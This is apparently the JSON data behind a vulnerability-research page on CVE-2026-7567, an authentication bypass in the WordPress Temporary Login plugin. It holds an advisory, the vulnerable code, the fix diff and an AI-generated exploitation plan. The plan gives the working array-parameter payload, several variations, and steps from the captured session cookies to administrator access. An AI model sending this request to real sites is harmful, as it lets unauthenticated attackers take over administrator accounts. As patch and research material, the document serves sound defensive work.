[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7PGqyZ66PnMMwNONCqt1sdzGsAdVNycx0VmM6xVN9m8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-7567","temporary-login-authentication-bypass-to-account-takeover","Temporary Login \u003C= 1.0.0 - Authentication Bypass to Account Takeover","The Temporary Login plugin for WordPress is vulnerable to Authentication Bypass in versions up to and including 1.0.0. This is due to improper input validation in the maybe_login_temporary_user() function, which fails to verify that the 'temp-login-token' GET parameter is a scalar string before processing it. When the parameter is supplied as an array, PHP's empty() check is bypassed and sanitize_key() returns an empty string, which is then passed as the meta_value to get_users(). WordPress ignores an empty meta_value and returns all users matching the meta_key '_temporary_login_token', allowing authentication without a valid token. This makes it possible for unauthenticated attackers to authenticate as any active temporary login user by sending a single crafted GET request.","temporary-login",null,"\u003C=1.0.0","1.1.0","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Authentication Bypass Using an Alternate Path or Channel","2026-04-30 20:59:11","2026-05-01 09:26:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff97c669b-86c1-4873-a050-76972f494099?source=api-prod",1,[22,23,24,25,26,27],"assets\u002Fadmin.asset.php","assets\u002Fadmin.js","core\u002Fadmin.php","core\u002Foptions.php","readme.txt","temporary-login.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-7567 - Temporary Login Authentication Bypass\n\n## 1. Vulnerability Summary\nThe **Temporary Login** plugin for WordPress (versions \u003C= 1.0.0) contains an authentication bypass vulnerability in the `maybe_login_temporary_user()` function. The vulnerability arises because the plugin fails to validate that the `temp-login-token` GET parameter is a scalar string before passing it to `sanitize_key()`. \n\nWhen an array is supplied (e.g., `temp-login-token[]=`), `sanitize_key()` returns an empty string. This empty string is then used in a `get_users()` query as the `meta_value` for the `_temporary_login_token` key. WordPress's `WP_User_Query` logic, when receiving an empty `meta_value`, may return all users possessing that `meta_key`. Since the plugin's temporary users are created with the `administrator` role by default, an unauthenticated attacker can authenticate as the first available temporary administrator by sending a crafted request.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: Any WordPress page (the vulnerable function is hooked to `init`).\n- **Hook**: `add_action( 'init', [ __CLASS__, 'maybe_login_temporary_user' ] );` in `core\u002Fadmin.php`.\n- **Parameter**: `temp-login-token` (GET parameter).\n- **Payload**: `temp-login-token[]=randomvalue`\n- **Authentication**: Unauthenticated.\n- **Precondition**: At least one active (non-expired) temporary login user must exist in the database.\n\n## 3. Code Flow\n1. **Entry Point**: A request is made to any WordPress URL with `?temp-login-token[]=1`.\n2. **Hook Execution**: `TemporaryLogin\\Core\\Admin::maybe_login_temporary_user()` is triggered during `init`.\n3. **Input Validation Failure** (`core\u002Fadmin.php`):\n   ```php\n   if ( empty( $_GET['temp-login-token'] ) ) { \u002F\u002F Returns false because array is not empty\n       return;\n   }\n   $token = sanitize_key( $_GET['temp-login-token'] ); \u002F\u002F Returns \"\" (empty string) for array input\n   ```\n4. **Data Retrieval** (`core\u002Foptions.php` via `Admin::maybe_login_temporary_user`):\n   ```php\n   $user = Options::get_user_by_token( $token ); \u002F\u002F $token is \"\"\n   ```\n5. **Vulnerable Query** (`core\u002Foptions.php`):\n   ```php\n   public static function get_user_by_token( $token ) {\n       $users = get_users( [\n           'meta_key' => '_temporary_login_token',\n           'meta_value' => $token, \u002F\u002F meta_value is \"\"\n       ] );\n       \u002F\u002F ... returns the first user matching the meta_key\n   }\n   ```\n6. **Authentication Bypass** (`core\u002Fadmin.php`):\n   ```php\n   if ( ! $user || Options::is_user_expired( $user->ID ) ) { ... }\n   static::process_login( $user ); \u002F\u002F Authenticates the attacker as $user[0]\n   ```\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **does not require a nonce**. The `maybe_login_temporary_user()` function is designed to handle auto-logins from external email links where nonces are not applicable. It relies solely on the `temp-login-token` for \"security.\"\n\n## 5. Exploitation Strategy\n1. **Create Target Data**: Use WP-CLI to generate a temporary user so the bypass has a target to find.\n2. **Trigger Bypass**: Send a GET request to the WordPress homepage with the array payload.\n3. **Capture Cookies**: The response should include `Set-Cookie` headers for the authenticated session.\n4. **Access Admin Area**: Use the captured cookies to request `\u002Fwp-admin\u002F` and verify administrator access.\n\n### HTTP Request (Payload)\n```http\nGET \u002F?temp-login-token[]=exploit HTTP\u002F1.1\nHost: localhost\n```\n\n## 6. Test Data Setup\n1. **Activate Plugin**: Ensure `temporary-login` is installed and active.\n2. **Create Temporary User**:\n   - Since we need to test the bypass, we must simulate a state where a temporary user exists.\n   - Run the following WP-CLI command to invoke the plugin's internal user generation:\n     ```bash\n     wp eval 'TemporaryLogin\\Core\\Options::generate_temporary_user();'\n     ```\n3. **Verify User Creation**:\n   ```bash\n   wp user list --role=administrator\n   ```\n   (Look for a user with the prefix `temp-login-`)\n\n## 7. Expected Results\n- The initial GET request to `\u002F?temp-login-token[]=exploit` should return a `302 Found` redirecting to `\u002Fwp-admin\u002F`.\n- The response headers should contain authentication cookies (`wordpress_logged_in_*`).\n- Following the redirect with the provided cookies should grant full access to the WordPress dashboard.\n\n## 8. Verification Steps\n1. **Check Logged-in User**:\n   After the HTTP request, use the capture session to check the current user's identity:\n   ```bash\n   # This is done via the PoC script checking the dashboard content or user profile\n   ```\n2. **Database State Check**:\n   Confirm the temporary user was indeed the one logged into:\n   ```bash\n   wp user get \u003Cusername_from_cookies> --field=roles\n   wp user get \u003Cusername_from_cookies> --field=display_name\n   ```\n\n## 9. Alternative Approaches\n- **Action Parameter**: If the direct login fails, try appending `&temp-login-action=info` to see if the plugin leaks the expiration data of the first temporary user, confirming the `get_users()` query is indeed returning a user object.\n- **Multiple Users**: If the first temporary user in the database is expired, the code will redirect to `home_url()`. In a real-world scenario, the attacker would hope for at least one active user. For testing, ensure the generated user is not expired (the default is 7 days).\n- **Payload Variations**:\n  - `?temp-login-token[0]=`\n  - `?temp-login-token[a]=b`\n  - `?temp-login-token[]=` (empty element)","The Temporary Login plugin for WordPress (\u003C= 1.0.0) is vulnerable to an authentication bypass that allows unauthenticated attackers to log in as a temporary administrator. The vulnerability exists because the plugin fails to ensure the 'temp-login-token' parameter is a string, allowing an array input to result in an empty string token that matches any valid temporary user in the database.","\u002F\u002F core\u002Fadmin.php line 153\npublic static function maybe_login_temporary_user() {\n\tif ( empty( $_GET['temp-login-token'] ) ) {\n\t\treturn;\n\t}\n\n\t$token = sanitize_key( $_GET['temp-login-token'] );\n\n\t$user = Options::get_user_by_token( $token );\n\n---\n\n\u002F\u002F core\u002Foptions.php line 147\npublic static function get_user_by_token( $token ) {\n\t$users = get_users( [\n\t\t'meta_key' => '_temporary_login_token',\n\t\t'meta_value' => $token,\n\t] );\n\n\tif ( empty( $users ) ) {\n\t\treturn null;\n\t}\n\n\treturn $users[0];\n}","--- core\u002Fadmin.php\n+++ core\u002Fadmin.php\n@@ -153,7 +153,7 @@\n \tpublic static function maybe_login_temporary_user() {\n-\t\tif ( empty( $_GET['temp-login-token'] ) ) {\n+\t\tif ( empty( $_GET['temp-login-token'] ) || ! is_string( $_GET['temp-login-token'] ) ) {\n \t\t\treturn;\n \t\t}","The exploit targets the `maybe_login_temporary_user` function hooked to WordPress `init`. An attacker sends a GET request to any page on the site with the parameter `temp-login-token[]` set to any value. Because the input is an array, `empty()` returns false, but `sanitize_key()` returns an empty string. The subsequent `get_users` query in `Options::get_user_by_token` searches for a user where `_temporary_login_token` is an empty string; WordPress's `WP_User_Query` logic treats an empty string `meta_value` as a broad match for any user possessing the `meta_key`. If at least one active temporary administrator exists, the query returns that user, and the plugin proceeds to call `wp_set_auth_cookie()`, logging the attacker in as that administrator.","gemini-3-flash-preview","2026-05-04 17:40:38","2026-05-04 17:40:56",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","1.0.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemporary-login\u002Ftags\u002F1.0.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftemporary-login.1.0.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemporary-login\u002Ftags\u002F1.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftemporary-login.1.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemporary-login\u002Ftags"]